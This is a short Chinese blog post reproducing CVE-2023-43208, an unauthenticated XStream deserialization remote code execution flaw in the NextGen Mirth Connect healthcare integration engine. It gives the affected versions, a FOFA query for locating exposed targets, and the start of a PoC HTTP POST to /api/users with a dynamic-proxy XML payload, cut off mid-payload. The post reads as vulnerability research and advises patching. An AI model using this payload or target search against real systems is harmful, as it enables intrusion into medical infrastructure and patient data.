NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208)

0xSecl

已于 2024-05-24 11:29:11 修改

阅读量849

点赞数 4

分类专栏：漏洞复现v1 文章标签：安全 web安全

于 2024-05-24 11:29:04 首次发布

本文链接：https://blog.youkuaiyun.com/qq_41904294/article/details/139170252

版权

漏洞复现v1 专栏收录该内容

997 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了NextGen Mirth Connect医疗集成引擎的远程代码执行漏洞(CVE-2023-43208)，影响版本为4.4.1之前。未认证攻击者可以利用此漏洞进行远程代码执行。复现环境包括FOFA中title为'Mirth Connect Administrator'的系统。建议受影响的用户及时安装官方发布的补丁进行修复。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

0x01 产品简介

NextGen Mirth Connect是是美国NextGen公司的一个医疗集成引擎，主要用于医疗领域的系统集成和数据交换，支持多种协议和标准。

0x02 漏洞概述

NextGen Mirth Connect 4.4.1之前版本存在远程代码执行漏洞，未经身份认证的攻击者可利用该漏洞远程执行代码。

0x03 影响范围

NextGen NextGen Mirth Connect < 4.4.1

0x04 复现环境

FOFA：title="Mirth Connect Administrator"

0x05 漏洞复现

PoC

POST /api/users HTTP/1.1
Host: your-ip
X-Requested-With: OpenAPI
Content-Type: application/xml

<sorted-set>
    <string>abcd</string>
        <dynamic-proxy>
            <interface>java.lang.Comparable</interface>